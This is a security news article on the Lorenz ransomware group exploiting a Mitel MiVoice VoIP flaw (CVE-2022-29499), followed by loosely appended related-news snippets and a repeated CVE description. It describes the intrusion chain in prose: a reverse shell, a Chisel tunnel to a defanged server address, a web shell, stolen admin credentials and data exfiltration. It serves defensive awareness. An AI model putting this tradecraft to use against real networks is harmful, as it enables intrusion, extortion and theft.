Headline
Lorenz Ransomware Goes After SMBs via Mitel VoIP Phone Systems
The ransomware gang has been seen exploiting a Mitel RCE flaw discovered in VoIP devices in April (and patched in July) to perform double-extortion attacks.
A ransomware gang has been seen using a unique initial-access tactic to exploit a vulnerability in voice-over-IP (VoIP) appliances to breach corporate phone systems, before pivoting to corporate networks to commit double-extortion attacks.
Researchers from Artic Wolf Labs have spotted the Lorenz ransomware group exploiting a flaw in Mitel MiVoice VoIP appliances. The bug (tracked as CVE-2022-29499) was discovered in April and fully patched in July, and is a remote code execution (RCE) flaw affecting the Mitel Service Appliance component of MiVoice Connect.
Lorenz exploited the flaw to obtain a reverse shell, after which the group leveraged Chisel, a Golang-based fast TCP/UDP tunnel that’s transported over HTTP, as a tunneling tool to breach the corporate environment, Arctic Wolf researchers said this week. The tool is “mainly useful for passing through firewalls,” according to the GitHub page.
The attacks show an evolution by threat actors to use “lesser known or monitored assets” to access networks and perform further nefarious activity to avoid detection, according to Arctic Wolf.
“In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and Internet of Things (IoT) devices without proper monitoring, which enables threat actors to gain a foothold into an environment without being detected,” the researchers wrote.
The activity underscores the need for enterprises to monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices, researchers said.
Mitel identified CVE-2022-29499 on April 19 and provided a script for releases 19.2 SP3 and earlier, and R14.x and earlier as a workaround before releasing MiVoice Connect version R19.3 in July to fully remediate the flaw.
Attack Details
Lorenz is a ransomware group that has been active since at least February 2021, and, like many of its cohorts, performs double extortion of its victims by exfiltrating data and threatening to expose it online if victims don’t pay the desired ransom in a certain time frame.
Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United States, with outliers in China and Mexico, according to Arctic Wolf.
In the attacks that researchers identified, the initial malicious activity originated from a Mitel appliance sitting on the network perimeter. Once establishing a reverse shell, Lorenz made use of the Mitel device’s command line interface to create a hidden directory and proceeded to download a compiled binary of Chisel directly from GitHub, via Wget.
Threat actors then renamed the Chisel binary to “mem,” unzipped it, and executed it to establish a connection back to a Chisel server listening at hxxps[://]137.184.181[.]252[:]8443, researchers said. Lorenz skipped TLS certificate verification and turned the client into a SOCKS proxy.
It’s worth noting that Lorenz waited nearly a month after breaching the corporate network to conduct additional ransomware activity, researchers said. Upon returning to the Mitel device, threat actors interacted with a Web shell named “pdf_import_export.php.” Shortly thereafter, the Mitel device started a reverse shell and Chisel tunnel again so threat actors could jump onto the corporate network, according to Arctic Wolf.
Once on the network, Lorenz obtained credentials for two privileged administrator accounts, one with local admin privileges and one with domain admin privileges, and used them to move laterally through the environment via RDP and subsequently to a domain controller.
Before encrypting files using BitLocker and Lorenz ransomware on ESXi, Lorenz exfiltrated data for double-extortion purposes via FileZilla, researchers said.
Attack Mitigation
To mitigate attacks that can leverage the Mitel flaw to launch ransomware or other threat activity, researchers recommend that organizations apply the patch as soon as possible.
Researchers also made general recommendations to avoid risk from perimeter devices as a way to avoid the pathways to corporate networks. One way to do this is to perform external scans to assess an organization’s footprint and harden its environment and security posture, they said. This will allow enterprises to discover assets about which administrators may not have known so that they can be protected, as well as help define an organization’s attack surface across devices exposed to the Internet, researchers noted.
Once all assets are identified, organizations should ensure that critical ones are not directly exposed to the Internet, removing a device from the perimeter if it doesn’t need to be there, researchers recommended.
Artic Wolf also recommended that organizations turn on Module Logging, Script Block Logging, and Transcription Logging, and send logs to a centralized logging solution as part of their PowerShell Logging configuration. They also should store captured logs externally so that they can perform detailed forensic analysis against evasive actions by threat actors in the case of an attack.
Related news
A single barrier prevented attackers from exploiting a critical vulnerability in an enterprise collaboration platform. Now there's a workaround.
Nearly 20% of the zero-day flaws that attackers exploited in 2022 were in network, security, and IT management products, Mandiant says.
Categories: News Categories: Ransomware Tags: Lorenz Tags: ransomware Tags: CVE-2022-29499 Tags: Mitel Tags: backdoor Tags: web shell A recent case-study showed once again that timely patching is important, but it's not a silver bullet for stopping ransomware. (Read more...) The post Timely patching is good, but sometimes it's not enough appeared first on Malwarebytes Labs.
The operators behind the Lornenz ransomware operation have been observed exploiting a now-patched critical security flaw in Mitel MiVoice Connect to obtain a foothold into target environments for follow-on malicious activities. "Initial malicious activity originated from a Mitel appliance sitting on the network perimeter," researchers from cybersecurity firm Arctic Wolf said in a report
By Deeba Ahmed According to researchers, the Lorenz ransomware variant targeted an unnamed organization by exploiting MiVoice Connect’s Mitel Service Appliance component. This is a post from HackRead.com Read the original post: Lorenz Ransomware Intrusion: How a VoIP Vulnerability Was Leveraged for Initial Access
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week moved to add a Linux vulnerability dubbed PwnKit to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. The issue, tracked as CVE-2021-4034 (CVSS score: 7.8), came to light in January 2022 and concerns a case of local privilege escalation in polkit's pkexec utility, which allows an
Researchers warn threat actors are using a novel remote code execution exploit to gain initial access to victim’s environments.
A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment. The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.